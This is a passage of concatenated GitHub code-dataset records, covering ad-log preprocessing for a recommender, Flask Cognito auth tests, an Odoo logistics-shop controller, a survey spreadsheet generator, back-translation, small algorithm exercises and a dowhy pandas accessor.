= pd.read_csv(F_PATH_FILE_AD_LOG, delimiter = ',', names=ad_log_header, error_bad_lines=False)\ndf2 = pd.read_csv(F_PATH_FILE_CAMPAIGN, delimiter = ',', header=0, error_bad_lines=False)\n\ndf1[\"flight_id\"] = pd.to_numeric(df1[\"flight_id\"], errors=\"coerce\") # coerce bad values to NaN to avoid errors when merging\ndf1 = df1[df1[\"flight_id\"].notnull()]  # \"!= None\" never filters NaN rows; notnull() does\n\ndf_join = df1.join(df2[['flight_id', 'industry_type_eng']].set_index('flight_id'), on='flight_id')\ndf_join = df_join.reset_index()\n\nif MODEL_BASED == \"industry_type\":\n    df_join = df_join[df_join['industry_type_eng'].notnull()]\ndf = df_join.iloc[:, 1:]\ndf = df.reset_index(drop=True)\nprint(df.head(10))\n\n#### 3. Handle datetime\ndef func_convert_time(a):\n    if 0 <= a <= 5:\n        return 0  # Sleep\n    elif a == 6:\n        return 1  # Breakfast\n    elif a == 7:\n        return 2  # Commute\n    elif 8 <= a <= 11:\n        return 3  # Office hours\n    elif 12 <= a <= 13:\n        return 4  # Lunch\n    elif 14 <= a <= 17:\n        return 5  # Office hours\n    elif a == 18:\n        return 6  # Commute\n    elif a == 19:\n        return 7  # Dinner\n    elif 20 <= a < 24:\n        return 8  # Resting\n    else:\n        return -1\n\nhours = pd.DatetimeIndex(df[\"view_datetime\"]).hour\ndf_hour1 = pd.DataFrame(data={\"view_hour\": hours}, index=df.index, dtype=np.int64)\ndf_hour2 = pd.to_numeric(df_hour1[\"view_hour\"].apply(func_convert_time))\ndf = pd.concat([df, df_hour2], axis=1)\nprint(df.tail(100))\nprint(\"Number of records: \", df.shape[0])\n\n#### 4. Filter records which appear at least n times for the same user\n#df = df[df.duplicated(subset=[\"user_id\"], keep=False)] # n >= 2\ncounts = Counter(df[\"user_id\"])\ndf = df[df[\"user_id\"].isin([key for key in counts if counts[key] > 5])] # n > 5\nprint(\"Number of records after removing users: \", df.shape[0])\n\n\n#### 5. 
Handle ID columns\nuser_labels, unique_users = pd.factorize(df[\"user_id\"])\nprint(\"Number of unique users is %d\" % len(unique_users))\nprint(unique_users[:5])\n\nadvertiser_id_labels, unique_advertiser_id = pd.factorize(df[\"advertiser_id\"])\nprint(\"Number of unique advertiser_id values is %d\" % len(unique_advertiser_id))\nprint(unique_advertiser_id[:5])\n\ncampaign_id_labels, unique_campaign_id = pd.factorize(df[\"campaign_id\"])\nprint(\"Number of unique campaign_id values is %d\" % len(unique_campaign_id))\nprint(unique_campaign_id[:5])\n\nflight_id_labels, unique_flight_id = pd.factorize(df[\"flight_id\"])\nprint(\"Number of unique flight_id values is %d\" % len(unique_flight_id))\nprint(unique_flight_id[:5])\n\n\n\n#### 6. Handle categorical columns\nsubdomain_labels, uniques_subdomain = pd.factorize(df['purl_subdomain'])\nprint(\"Number of unique purl_subdomain values is %d\" % len(uniques_subdomain))\nprint(uniques_subdomain[:5])\n\npurl_base_labels, uniques_purl_base = pd.factorize(df['purl_base'])\nprint(\"Number of unique purl_base values is %d\" % len(uniques_purl_base))\nprint(uniques_purl_base[:5])\n\nos_labels, unique_os = pd.factorize(df['os'])\nprint(\"Number of unique os values is %d\" % len(unique_os))\nprint(unique_os)\n\ndevice_labels, unique_device = pd.factorize(df['device'])\nprint(\"Number of unique device values is %d\" % len(unique_device))\nprint(unique_device)\n\nsource_log_labels, unique_source_log = pd.factorize(df['source_log_nm'])\nprint(\"Number of unique source_log values is %d\" % len(unique_source_log))\nprint(unique_source_log)\n\nip_address_labels, unique_ip_address = pd.factorize(df['ip_address'])\nprint(\"Number of unique ip_address values is %d\" % len(unique_ip_address))\nprint(unique_ip_address)\n\nindustry_type_labels, unique_industry_type = pd.factorize(df['industry_type_eng'])\nprint(\"Number of unique industry_type_eng values is %d\" % len(unique_industry_type))\nprint(unique_industry_type)\n\n# Replace raw values with their integer factor labels\ndf['user_id'] = user_labels\ndf['advertiser_id'] = advertiser_id_labels\ndf['campaign_id'] = campaign_id_labels\ndf['flight_id'] = flight_id_labels\ndf['purl_subdomain'] = subdomain_labels\ndf['purl_base'] = purl_base_labels\ndf['os'] = os_labels\ndf['device'] = device_labels\ndf['source_log_nm'] = source_log_labels\ndf['ip_address'] = ip_address_labels\ndf['industry_type_eng'] = industry_type_labels\n\n\ndf = df.sort_values(by=[\"user_id\"]).reset_index(drop=True) # sort by user_id then reset index\nprint(len(df[\"user_id\"].unique())) # 445 unique users, each appearing at least 6 times\n\n\n#### 7. Building matrices based on industry_type and advertiser_id\nlen_user = len(df[\"user_id\"].unique())\nlen_it = 9 * len(unique_industry_type)\nlen_ai = 9 * len(unique_advertiser_id)\n\nmat_it = np.zeros((len_user, len_it))\nmat_ai = np.zeros((len_user, len_ai))\nfor _, u in df.iterrows():  # row index unused; avoid shadowing built-in id\n    user_pos = u[\"user_id\"]\n    view_hour = u[\"view_hour\"]\n    industry_type = u[\"industry_type_eng\"]\n    advertiser_id = u[\"advertiser_id\"]\n    item_pos1 = view_hour * len(unique_industry_type) + industry_type\n    item_pos2 = view_hour * len(unique_advertiser_id) + advertiser_id\n    mat_it[user_pos][item_pos1] += 1\n    mat_ai[user_pos][item_pos2] += 1\n\nprint(mat_it)\nprint(mat_ai)\n\nnp.savetxt(DATA_PATH + \"mat_it.csv\", mat_it, fmt='%d', delimiter=',', newline='\\n', comments='')\nnp.savetxt(DATA_PATH + \"mat_ai.csv\", mat_ai, fmt='%d', delimiter=',', newline='\\n', comments='')\n\ntrain_file_it = []\ntest_file_it = []\ntrain_file_ai = []\ntest_file_ai = []\n\n#### 8. 
Building file user_id, item_id, access_counting\nfor i in range(len_user):\n for j in range(len_it):\n if uniform(0, 1) < 0.7:\n train_file_it.append([i, j, mat_it[i][j]])\n else:\n test_file_it.append([i, j, mat_it[i][j]])\n\n for k in range(len_ai):\n if uniform(0, 1) < 0.7:\n train_file_ai.append([i, k, mat_ai[i][k]])\n else:\n test_file_ai.append([i, k, mat_ai[i][k]])\n\nnp.savetxt(DATA_PATH + \"train_file_it.csv\", np.array(train_file_it), fmt='%d', delimiter=',', newline='\\n', comments='')\nnp.savetxt(DATA_PATH + \"test_file_it.csv\", np.array(test_file_it), fmt='%d', delimiter=',', newline='\\n', comments='')\nnp.savetxt(DATA_PATH + \"train_file_ai.csv\", np.array(train_file_ai), fmt='%d', delimiter=',', newline='\\n', comments='')\nnp.savetxt(DATA_PATH + \"test_file_ai.csv\", np.array(test_file_ai), fmt='%d', delimiter=',', newline='\\n', comments='')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"thieu1995/adv_recom_sys","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":8191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24917708235","text":"from unittest import mock\n\nimport spp_cognito_auth\n\n\n@mock.patch.object(spp_cognito_auth.Auth, \"logged_in\")\ndef test_required_auth_logged_in(mock_logged_in, client):\n mock_logged_in.return_value = True\n response = client.get(\"/\")\n assert response.status_code == 200\n assert response.data == b\"Hello, World!\"\n\n\n@mock.patch.object(spp_cognito_auth.Auth, \"logged_in\")\ndef test_required_auth_logged_out(mock_logged_in, client, flask_app):\n mock_logged_in.return_value = False\n response = client.get(\"/\")\n assert response.status_code == 302\n assert response.headers[\"Location\"].startswith(\n \"https://test-cognito-domain.test.com/login?\"\n + \"client_id=test-client-id&\"\n + \"response_type=code&\"\n + \"scope=aws.cognito.signin.user.admin+email+openid+phone+profile&\"\n + \"redirect_uri=http://test-app-host.test.com/auth/callback&\"\n + \"state=\"\n )\n assert flask_app.auth.get_redirect() == \"http://localhost/\"\n\n\n@mock.patch.object(spp_cognito_auth.Auth, \"logged_in\")\n@mock.patch.object(spp_cognito_auth.Auth, \"match_role\")\ndef test_required_roles_authorised(mock_match_role, mock_logged_in, client):\n mock_match_role.return_value = True\n mock_logged_in.return_value = True\n response = client.get(\"/test-roles\")\n assert response.status_code == 200\n assert response.data == b\"Welcome to the Role endpoint!\"\n\n\n@mock.patch.object(spp_cognito_auth.Auth, \"logged_in\")\n@mock.patch.object(spp_cognito_auth.Auth, \"match_role\")\ndef test_required_roles_not_authorised(mock_match_role, mock_logged_in, client):\n mock_match_role.return_value = False\n mock_logged_in.return_value = True\n response = client.get(\"/test-roles\")\n assert response.status_code == 403\n","repo_name":"ONSdigital/spp-cognito-auth","sub_path":"tests/test_decorator.py","file_name":"test_decorator.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"32911538129","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom werkzeug.exceptions import Forbidden, NotFound\nfrom odoo import http, tools, fields\nfrom odoo.http import request\nfrom odoo.addons.sale.controllers.product_configurator import ProductConfiguratorController\nimport logging\nfrom odoo.addons.http_routing.models.ir_http import slug\nfrom 
odoo.addons.website.controllers.main import QueryURL\nfrom odoo.addons.website_sale.controllers.main import TableCompute\nfrom odoo.addons.website_sale_network.controllers.main import WebsiteSaleDeliveryNetwork\n\n_logger = logging.getLogger(__name__)\n\n\nPPG = 20 # Products Per Page\nPPR = 4 # Products Per Row\n\n\nclass LogisticsShop(WebsiteSaleDeliveryNetwork):\n @http.route([\n '''/logistics_shop''',\n '''/logistics_shop/page/''',\n '''/logistics_shop/category/''',\n '''/logistics_shop/category//page/'''\n ], type='http', auth=\"public\", website=True)\n def logistics_shop(self, page=0, category=None, search='', ppg=False, **post):\n add_qty = int(post.get('add_qty', 1))\n if category:\n category = request.env['product.public.category'].search([('id', '=', int(category))], limit=1)\n if not category or not category.can_access_from_current_website():\n raise NotFound()\n\n if ppg:\n try:\n ppg = int(ppg)\n except ValueError:\n ppg = PPG\n post[\"ppg\"] = ppg\n else:\n ppg = PPG\n\n attrib_list = request.httprequest.args.getlist('attrib')\n attrib_values = [[int(x) for x in v.split(\"-\")] for v in attrib_list if v]\n attributes_ids = {v[0] for v in attrib_values}\n attrib_set = {v[1] for v in attrib_values}\n\n domain = self._get_search_domain(search, category, attrib_values)\n\n keep = QueryURL('/logistics_shop', category=category and int(category), search=search, attrib=attrib_list,\n order=post.get('order'))\n\n pricelist_context, pricelist = self._get_pricelist_context()\n\n request.context = dict(request.context, pricelist=pricelist.id, partner=request.env.user.partner_id)\n\n url = \"/logistics_shop\"\n if search:\n post[\"search\"] = search\n if attrib_list:\n post['attrib'] = attrib_list\n\n Product = request.env['product.template'].with_context(bin_size=True)\n\n Category = request.env['product.public.category']\n search_categories = False\n search_product = Product.search(domain)\n if search:\n categories = search_product.mapped('public_categ_ids')\n search_categories = Category.search(\n [('id', 'parent_of', categories.ids)] + request.website.website_domain())\n categs = search_categories.filtered(lambda c: not c.parent_id)\n else:\n categs = Category.search([('parent_id', '=', False)] + request.website.website_domain())\n\n parent_category_ids = []\n if category:\n url = \"/logistics_shop/category/%s\" % slug(category)\n parent_category_ids = [category.id]\n current_category = category\n while current_category.parent_id:\n parent_category_ids.append(current_category.parent_id.id)\n current_category = current_category.parent_id\n\n product_count = len(search_product)\n pager = request.website.pager(url=url, total=product_count, page=page, step=ppg, scope=7, url_args=post)\n products = Product.search(domain, limit=ppg, offset=pager['offset'], order=self._get_search_order(post))\n\n ProductAttribute = request.env['product.attribute']\n if products:\n # get all products without limit\n attributes = ProductAttribute.search([('attribute_line_ids.value_ids', '!=', False),\n ('attribute_line_ids.product_tmpl_id', 'in', search_product.ids)])\n else:\n attributes = ProductAttribute.browse(attributes_ids)\n\n compute_currency = self._get_compute_currency(pricelist, products[:1])\n\n values = {\n 'search': search,\n 'category': category,\n 'attrib_values': attrib_values,\n 'attrib_set': attrib_set,\n 'pager': pager,\n 'pricelist': pricelist,\n 'add_qty': add_qty,\n 'products': products,\n 'search_count': product_count, # common for all searchbox\n 'bins': 
TableCompute().process(products, ppg),\n            'rows': PPR,\n            'categories': categs,\n            'attributes': attributes,\n            'compute_currency': compute_currency,\n            'keep': keep,\n            'parent_category_ids': parent_category_ids,\n            'search_categories_ids': search_categories and search_categories.ids,\n        }\n        if category:\n            values['main_object'] = category\n        return request.render(\"website_logistics_shop.logistics_products\", values)\n\n    @http.route(['/logistics_shop/product/'], type='http', auth=\"public\", website=True)\n    def logistics_product(self, product, category='', search='', **kwargs):\n        if not product.can_access_from_current_website():\n            raise NotFound()\n\n        add_qty = int(kwargs.get('add_qty', 1))\n\n        product_context = dict(request.env.context, quantity=add_qty,\n                               active_id=product.id,\n                               partner=request.env.user.partner_id)\n        ProductCategory = request.env['product.public.category']\n\n        if category:\n            category = ProductCategory.browse(int(category)).exists()\n\n        attrib_list = request.httprequest.args.getlist('attrib')\n        attrib_values = [[int(x) for x in v.split(\"-\")] for v in attrib_list if v]\n        attrib_set = {v[1] for v in attrib_values}\n\n        keep = QueryURL('/logistics_shop', category=category and category.id, search=search, attrib=attrib_list)\n\n        categs = ProductCategory.search([('parent_id', '=', False)])\n\n        pricelist = request.website.get_current_pricelist()\n\n        def compute_currency(price):\n            return product.currency_id._convert(price, pricelist.currency_id,\n                                                product._get_current_company(pricelist=pricelist,\n                                                                             website=request.website),\n                                                fields.Date.today())\n\n        if not product_context.get('pricelist'):\n            product_context['pricelist'] = pricelist.id\n            product = product.with_context(product_context)\n\n        values = {\n            'search': search,\n            'category': category,\n            'pricelist': pricelist,\n            'attrib_values': attrib_values,\n            # compute_currency deprecated, get from product\n            'compute_currency': compute_currency,\n            'attrib_set': attrib_set,\n            'keep': keep,\n            'categories': categs,\n            'main_object': product,\n            'product': product,\n            'add_qty': add_qty,\n            'optional_product_ids': [p.with_context(active_id=p.id) for p in product.optional_product_ids],\n            # get_attribute_exclusions deprecated, use product method\n            'get_attribute_exclusions': self._get_attribute_exclusions,\n        }\n        return request.render(\"website_logistics_shop.logistics_product_info\", values)\n\n    @http.route(['/logistics_shop/sale_order/'], type='http', auth=\"user\", website=True, methods=['POST'])\n    def logistics_create_sale_order(self, service_product_id=None, **post):\n\n        _logger.info({\n            'logistics_create_sale_order post': post\n        })\n        # order = request.website.sale_get_order()\n        if post:\n\n            service_product_id = request.env['product.product'].browse(int(service_product_id))  # route param arrives as a string id\n\n            self.create_sale_order(post, service_product_id)\n\n        return request.redirect('/logistics_shop')\n\n    # Create a sale order from the posted delivery request\n    def create_sale_order(self, post, service_product_id):\n        \"\"\"\n        Create a sale order\n        :return:\n        \"\"\"\n        current_partner_id = request.env.user.partner_id\n        from_location_name = post.get('from_location_name', False)\n        to_location_name = post.get('to_location_name', False)\n        delivery_carrier_id = post.get('logistics_delivery_type', False)\n        delivery_weight = post.get('product_weight')\n        delivery_amount = post.get('delivery_amount')\n\n        from_warehouse_id, to_warehouse_id = self.find_correct_belong_position(\n            from_location_name,\n            to_location_name\n        )\n\n        order_obj = request.env['sale.order'].sudo()\n        data = {\n            'partner_id': current_partner_id.id,\n            'partner_invoice_id': 
current_partner_id.id,\n            'partner_shipping_id': current_partner_id.id,\n            'carrier_id': delivery_carrier_id,\n            'from_warehouse_id': from_warehouse_id.id,\n            'to_warehouse_id': to_warehouse_id.id,\n            'src_location_name': from_location_name,\n            'dest_location_name': to_location_name\n        }\n\n        order_line_data = self.parse_sale_order_line_data(service_product_id, delivery_weight, delivery_amount)\n\n        data.update({\n            'order_line': order_line_data\n        })\n\n        _logger.info({\n            'data': data\n        })\n        sale_order_id = order_obj.create(data)\n        return sale_order_id\n\n    # Build the sale order lines (service product + weight units)\n    def parse_sale_order_line_data(self, service_product_id, delivery_weight, delivery_amount):\n        unit_product_id = request.env['product.product'].sudo().search([\n            ('barcode', '=', 'TEST_UNIT_PRODUCT')\n        ])\n        service_product_data = {\n            'product_id': service_product_id.id,\n            'name': service_product_id.name,\n            'product_uom': service_product_id.uom_id.id,\n            'product_uom_qty': 1,\n            'price_unit': delivery_amount\n        }\n        unit_product_data = {\n            'product_id': unit_product_id.id,\n            'name': unit_product_id.name,\n            'product_uom': unit_product_id.uom_id.id,\n            'product_uom_qty': delivery_weight\n        }\n        data = [(0, 0, service_product_data), (0, 0, unit_product_data)]\n        return data\n\n    @http.route(['/get_location_lng_lat'], type='json', auth='public', methods=['POST'], website=True, csrf=False)\n    def get_location_lng_lat(self, **post):\n        if post:\n            location_name = post.get('location_name', False)\n            if location_name:\n                location_lng, location_lat = self.get_long_lat_value(location_name)\n                return {\n                    'location_lng': location_lng,\n                    'location_lat': location_lat,\n                    'location_lng_lat': location_lng + ', ' + location_lat\n                }\n\n    @http.route(['/logistics/delivery_price'], type='json', auth='public', methods=['POST'], website=True, csrf=False)\n    def get_logistics_delivery_price(self, **post):\n        _logger.info({\n            'post': post\n        })\n        if post:\n            carrier_id = request.env['delivery.carrier'].browse(int(post.get('carrier_id')))\n            from_location_name = post.get('from_location_name', False)\n            to_location_name = post.get('to_location_name', False)\n\n            _logger.info({\n                'from_location_name': from_location_name,\n                'to_location_name': to_location_name,\n                'carrier_id': carrier_id\n            })\n\n            from_warehouse_id, to_warehouse_id = self.find_correct_belong_position(\n                from_location_name,\n                to_location_name\n            )\n\n            # Lowest total price\n            price_total, shortest_path = carrier_id.get_price_from_network_by_warehouse(\n                from_warehouse_id,\n                to_warehouse_id,\n                shortest_path=True,\n                usage_type='price'\n            )\n\n            _logger.info({\n                'price_total': price_total,\n                'shortest_path': shortest_path\n            })\n            type_distance, type_distance_path = carrier_id.get_price_from_network_by_warehouse(\n                from_warehouse_id,\n                to_warehouse_id,\n                shortest_path=True,\n                usage_type='distance'\n            )\n\n            type_time, type_time_path = carrier_id.get_price_from_network_by_warehouse(\n                from_warehouse_id,\n                to_warehouse_id,\n                shortest_path=True,\n                usage_type='time'\n            )\n            #\n            # type_time = False\n            # type_time_path = False\n            # type_distance = False\n            # type_distance_path = False\n            # Return longitude/latitude via get_long_lat_value\n            # from_lng, from_lat = self.get_long_lat_value(from_location_name)\n            # to_lng, to_lat = self.get_long_lat_value(to_location_name)\n            # from_location_lnglat = from_lng + ', ' + from_lat\n            # to_location_lnglat = to_lng + ', ' + to_lat\n\n            return {\n                'type_distance': type_distance,\n                'type_distance_path': type_distance_path,\n                'type_time': type_time,\n                'type_time_path': type_time_path,\n                # 'from_location_lnglat': from_location_lnglat,\n                # 'to_location_lnglat': 
to_location_lnglat,\n 'carrier_id': carrier_id.id,\n 'shortest_path': shortest_path,\n 'success': True,\n 'new_amount_delivery': price_total,\n 'error_message': False,\n 'warning_message': False\n }\n","repo_name":"id10tttt/Logistics_Platform","sub_path":"website_logistics_shop/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"36058905378","text":"import random\nimport sys\n\nfrom scripts.statistics.survey_generator import *\n\nif __name__ == \"__main__\":\n if len(sys.argv) <= 1:\n subject_idx = 00\n subject_cod = str(00)\n subject_hrtf = str(000)\n else:\n subject_idx = int(sys.argv[1])\n subject_cod = str(sys.argv[2])\n subject_hrtf = str(sys.argv[3])\n\n survey_setup = json_load(\"scripts/statistics/survey_setup.json\")\n trial_setups = survey_setup[\"trial_setups\"]\n conditions = [(\"complexity\", \"latin\"),\n (\"room\", \"shuffle\"),\n (\"conditions\", \"shuffle\"),\n (\"speaker\", \"shuffle\")]\n\n sg = SurveyGenerator(survey_setup, conditions, subject_idx, len(survey_setup['complexity']))\n randomized_dict = sg.get_randomized_dict()\n\n for complexity, rooms in randomized_dict.items():\n for room, conditions in rooms.items():\n for condition, speakers in conditions.items():\n conditions[condition] = random.sample(speakers, int(complexity))\n\n workbook = xlsxwriter.Workbook(f'test_results/{subject_idx}_{subject_cod}_{subject_hrtf}.xlsx')\n\n cell_format = workbook.add_format({'border': 1, 'align': 'left'})\n impostor_format = workbook.add_format({'italic': 1, 'border': 1, 'align': 'left', 'bg_color': 'pink'})\n speaker_colors = {\"DAVID\": 'red', \"ALEX\": 'cyan', \"SUSAN\": 'lime', \"MARIA\": 'yellow'}\n\n merge_format = workbook.add_format({\n 'bold': 1,\n 'border': 2,\n 'align': 'center',\n 'valign': 'vcenter'})\n\n for c_col, complexity in enumerate(randomized_dict.keys()):\n c_idx = c_col * 2\n comp = int(complexity)\n compsheet = workbook.add_worksheet(f'Complexity_{complexity}')\n compsheet.set_column(0, 7, 17)\n\n for r_col, room in enumerate(randomized_dict[complexity].keys()):\n conditions = randomized_dict[complexity][room].keys()\n n_conditions = len(conditions)\n\n r_idx = r_col * 2\n compsheet.merge_range(0,\n r_idx,\n 0,\n r_idx + 1,\n room,\n merge_format)\n\n for cond_idx, condition in enumerate(conditions):\n cond_row = (cond_idx * (comp + 2)) + 1\n compsheet.merge_range(cond_row,\n r_idx,\n cond_row,\n r_idx + 1,\n condition,\n merge_format)\n compsheet.write(cond_row + 1, r_idx, \"same_room\", cell_format)\n compsheet.write_blank(cond_row + 1, r_idx + 1, None, cell_format)\n\n for i, speaker in enumerate(randomized_dict[complexity][room][condition]):\n impostor = trial_setups[room][complexity]['impostor'][condition]\n position = trial_setups[room][complexity]['position'][i]\n if impostor != position:\n color = speaker_colors[speaker]\n speaker_format = workbook.add_format({'border': 1, 'align': 'left', 'bg_color': color})\n pos_format = speaker_format\n else:\n pos_format = impostor_format\n compsheet.write(cond_row + i + 2, r_idx, f'{position} - {speaker}', pos_format)\n compsheet.write_blank(cond_row + i + 2, r_idx + 1, None, cell_format)\n\n questionnaire = workbook.add_worksheet(\"Questionnaire\")\n\n questionnaire.set_column(0, 6, 17)\n questionnaire.set_column(6, 6, 100)\n\n rooms = {'ALEX': 'METU',\n 'DAVID': '3D_MARCo',\n 'SUSAN': 'LIVING_ROOM',\n 'MARIA': '3D_MARCo'}\n\n speakers = survey_setup['speaker']\n 
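# NOTE (added annotation, reading of the code, not from the original author): the block below\n    # counterbalances presentation order -- speaker order follows this subject's row of a Latin\n    # square, so each speaker occupies each serial position equally often across subjects, while\n    # the three conditions are re-shuffled per speaker via random.sample further down.\n    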
conditions = ['Ref', 'HOA_Bin', 'FV']\n\n latin_size = len(speakers)\n latin_square = latin_squares[str(latin_size)]\n\n s_idx = subject_idx % latin_size\n subject_offset = s_idx * latin_size\n latin_row = latin_square[subject_offset: subject_offset + latin_size]\n\n questionnaire.write(0, 0, \"Room\", merge_format)\n questionnaire.write(0, 1, \"Condition\", merge_format)\n questionnaire.write(0, 2, \"Speaker\", merge_format)\n questionnaire.write(0, 3, \"Externalization\", merge_format)\n\n questionnaire.write(0, 4, \"Question\", merge_format)\n questionnaire.write(1, 4, \"Age\", cell_format)\n questionnaire.write(2, 4, \"Sex\", cell_format)\n questionnaire.write(3, 4, \"Reverberation\", cell_format)\n questionnaire.write(4, 4, \"VR\", cell_format)\n questionnaire.write(5, 4, \"Impairment\", cell_format)\n questionnaire.write(6, 4, \"Start (Preliminary)\", cell_format)\n questionnaire.write(7, 4, \"End (Test)\", cell_format)\n questionnaire.write(8, 4, \"Duration\", cell_format)\n\n questionnaire.write(0, 5, \"Answer\", merge_format)\n questionnaire.write(0, 6, \"Feedback\", merge_format)\n\n for i, speaker in enumerate(latin_row):\n idx = i % len(rooms)\n sp = speakers[speaker]\n\n color = speaker_colors[sp]\n speaker_format = workbook.add_format({'border': 1, 'align': 'left', 'bg_color': color})\n\n row_idx = i * 3\n\n questionnaire.write(row_idx + 1, 0, rooms[sp], cell_format)\n questionnaire.write(row_idx + 2, 0, rooms[sp], cell_format)\n questionnaire.write(row_idx + 3, 0, rooms[sp], cell_format)\n\n conditions = random.sample(conditions, len(conditions))\n\n questionnaire.write(row_idx + 1, 1, conditions[0], cell_format)\n questionnaire.write(row_idx + 2, 1, conditions[1], cell_format)\n questionnaire.write(row_idx + 3, 1, conditions[2], cell_format)\n\n questionnaire.write(row_idx + 1, 2, sp, speaker_format)\n questionnaire.write(row_idx + 2, 2, sp, speaker_format)\n questionnaire.write(row_idx + 3, 2, sp, speaker_format)\n\n workbook.close()\n print(0)\n","repo_name":"RickBn/Reverb_Parameters_Optimization","sub_path":"generate_survey.py","file_name":"generate_survey.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"40527205266","text":"# Install the required transformers library.\n# !pip install transformers\n\nimport torch\nfrom transformers import MarianMTModel, MarianTokenizer\n\n\nclass BackTranslation:\n def __init__(self):\n # Create source language tokenizer and model\n self.tokenizer_src = MarianTokenizer.from_pretrained('Helsinki-NLP/opus-mt-en-fr')\n self.model_src = MarianMTModel.from_pretrained('Helsinki-NLP/opus-mt-en-fr')\n\n # Create target language tokenizer and model\n self.tokenizer_tgt = MarianTokenizer.from_pretrained('Helsinki-NLP/opus-mt-fr-en')\n self.model_tgt = MarianMTModel.from_pretrained('Helsinki-NLP/opus-mt-fr-en')\n\n def translate(self, text, model, tokenizer):\n \"\"\"Translate a given text using the provided model and tokenizer.\"\"\"\n encoded_text = tokenizer.prepare_seq2seq_batch([text], return_tensors='pt')\n translation_logits = model.generate(**encoded_text)\n decoded_translation = tokenizer.batch_decode(translation_logits, skip_special_tokens=True)[0]\n\n return decoded_translation\n\n def backtranslate(self, text, n=1):\n \"\"\"Backtranslate a given text n times.\"\"\"\n augmented_text = text\n\n for i in range(n):\n # Translate to French\n fr_text = self.translate(augmented_text, self.model_src, self.tokenizer_src)\n\n # Translate back 
to English\n en_text = self.translate(fr_text, self.model_tgt, self.tokenizer_tgt)\n\n # Use this augmented text as the basis for the next augmentation\n augmented_text = en_text\n\n print(f\"Augmentation {i + 1}: {augmented_text}\")\n\n\n# Test the script\nbt = BackTranslation()\nsentence = \"This day is very nice but I wish I could have some ice cream as well.\"\naugment_num = 10\n\nbt.backtranslate(sentence, augment_num)\n","repo_name":"RobinGerster/Data-Augmentation-Project","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27716381545","text":"# def gcd(a, b):\n# while b:\n# a, b = b, a % b\n# return a\n# def lcm(a, b):\n# return (a * b) // gcd(a, b)\n# for _ in range(int(input())):\n# num1, num2 = map(int,input().split())\n# result_lcm = lcm(num1, num2)\n# print(f\"LCM = {result_lcm}\")\n\ndef compute_lcm(x, y):\n\n if x > y:\n greater = x\n else:\n greater = y\n\n while(True):\n if((greater % x == 0) and (greater % y == 0)):\n lcm = greater\n break\n greater += 1\n\n return lcm\nt = int(input())\nfor _ in range(t):\n num1, num2 = map(int, input().split())\n\n print(f\"LCM = {compute_lcm(num1, num2)}\")","repo_name":"mehedihasanreal/52_Problem_Solve","sub_path":"problem25.py","file_name":"problem25.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42679474315","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def hasCycle(self, head):\n pre = cur = head\n while cur != None and cur.next != None:\n pre = pre.next\n cur = cur.next.next\n if cur == pre:\n return True\n return False\n\n \n\n","repo_name":"shawn2000100/LeetCode_Easy_Code","sub_path":"141. Linked List Cycle.py","file_name":"141. 
Linked List Cycle.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"12530064603","text":"import pandas as pd\nimport logging\nfrom dowhy.do_why import CausalModel\nimport dowhy.do_samplers as do_samplers\n\n\n@pd.api.extensions.register_dataframe_accessor(\"causal\")\nclass CausalAccessor(object):\n def __init__(self, pandas_obj):\n self._obj = pandas_obj\n self._causal_model = None\n self._sampler = None\n self._identified_estimand = None\n self._method = None\n\n def reset(self):\n self._causal_model = None\n self._identified_estimand = None\n self._sampler = None\n self._method = None\n\n def do(self, x, method='weighting', num_cores=1, variable_types={}, outcome=None, params=None, dot_graph=None,\n common_causes=None, instruments=None, estimand_type='ate', proceed_when_unidentifiable=False,\n stateful=False):\n x, keep_original_treatment = self.parse_x(x)\n if not stateful or method != self._method:\n self.reset()\n if not self._causal_model:\n self._causal_model = CausalModel(self._obj,\n [xi for xi in x.keys()][0],\n outcome,\n graph=dot_graph,\n common_causes=common_causes,\n instruments=instruments,\n estimand_type=estimand_type,\n proceed_when_unidentifiable=proceed_when_unidentifiable)\n self._identified_estimand = self._causal_model.identify_effect()\n if not self._sampler:\n self._method = method\n do_sampler_class = do_samplers.get_class_object(method + \"_sampler\")\n self._sampler = do_sampler_class(self._obj,\n self._identified_estimand,\n self._causal_model._treatment,\n self._causal_model._outcome,\n params=params,\n variable_types=variable_types,\n num_cores=num_cores,\n causal_model=self._causal_model,\n keep_original_treatment=keep_original_treatment)\n result = self._sampler.do_sample(x)\n if not stateful:\n self.reset()\n return result\n\n def parse_x(self, x):\n if type(x) == str:\n return {x: None}, True\n if type(x) == list:\n return {xi: None for xi in x}, True\n if type(x) == dict:\n return x, False\n raise Exception('x format not recognized: {}'.format(type(x)))\n","repo_name":"ghostintheshellarise/dowhy","sub_path":"dowhy/api/causal_data_frame.py","file_name":"causal_data_frame.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"12940927021","text":"import numpy as np\nimport json\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport argparse\nimport logging\nimport os\nimport copy\nimport datetime\nimport random\n\n\nfrom model import *\nfrom utils import *\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--model', type=str, default='resnet50', help='neural network used in training')\n parser.add_argument('--skip', type=int, default=3, help='neural network used in 